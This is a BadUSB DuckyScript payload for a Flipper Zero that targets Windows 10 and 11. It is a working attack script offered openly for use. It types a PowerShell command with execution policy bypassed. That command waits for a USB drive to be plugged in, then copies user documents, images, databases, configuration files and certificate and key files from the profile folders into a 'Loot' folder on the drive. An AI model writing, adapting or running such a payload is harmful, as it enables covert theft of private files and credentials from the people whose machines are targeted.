BadUSB-Files-For-FlipperZero/OSINT/Exfiltrate Files to USB Drive.txt

REM Title: Exfiltrate files to Removable Drive
REM Author: @beigeworm
REM Description: Waits for a new USB Storage device to be connected and then copies many user files to that USB drive
REM Target: Windows 10 and 11

REM 1. Run this script.
REM 2. Connect your USB drive

REM some setup for dukie script
DEFAULT_DELAY 100

GUI r
DELAY 750
STRING powershell -NoP -Exec Bypass
ENTER
DELAY 4000
STRING $removableDrives = Get-WmiObject Win32_LogicalDisk | Where-Object { $_.DriveType -eq 2 };$count = $removableDrives.count;Write-Host "Connect a USB Drive.";While ($count -eq $removableDrives.count){$removableDrives = Get-WmiObject Win32_LogicalDisk | Where-Object { $_.DriveType -eq 2 };sleep 1};$drive = Get-WmiObject Win32_LogicalDisk | Where-Object { $_.DriveType -eq 2 } | Sort-Object -Descending | Select-Object -First 1;$driveLetter = $drive.DeviceID;Write-Host "Loot Drive Set To : $driveLetter/";$fileExtensions = @("*.log", "*.db", "*.txt", "*.doc", "*.pdf", "*.jpg", "*.jpeg", "*.png", "*.wdoc", "*.xdoc", "*.cer", "*.key", "*.xls", "*.xlsx", "*.cfg", "*.conf", "*.wpd", "*.rft");$foldersToSearch = @("$env:USERPROFILE\Documents","$env:USERPROFILE\Desktop","$env:USERPROFILE\Downloads","$env:USERPROFILE\OneDrive","$env:USERPROFILE\Pictures","$env:USERPROFILE\Videos");$destinationPath = "$driveLetter\$env:COMPUTERNAME`_Loot";if (-not(Test-Path -Path $destinationPath)) {New-Item -ItemType Directory -Path $destinationPath -Force;Write-Host "New Folder Created : $destinationPath"}foreach ($folder in $foldersToSearch) {Write-Host "Searching in $folder";foreach ($extension in $fileExtensions) {$files = Get-ChildItem -Path $folder -Recurse -Filter $extension -File;foreach ($file in $files) {$destinationFile = Join-Path -Path $destinationPath -ChildPath $file.Name;Write-Host "Copying $($file.FullName) to $($destinationFile)";Copy-Item -Path $file.FullName -Destination $destinationFile -Force}}}Write-Host "File Exfiltration complete.";exit
ENTER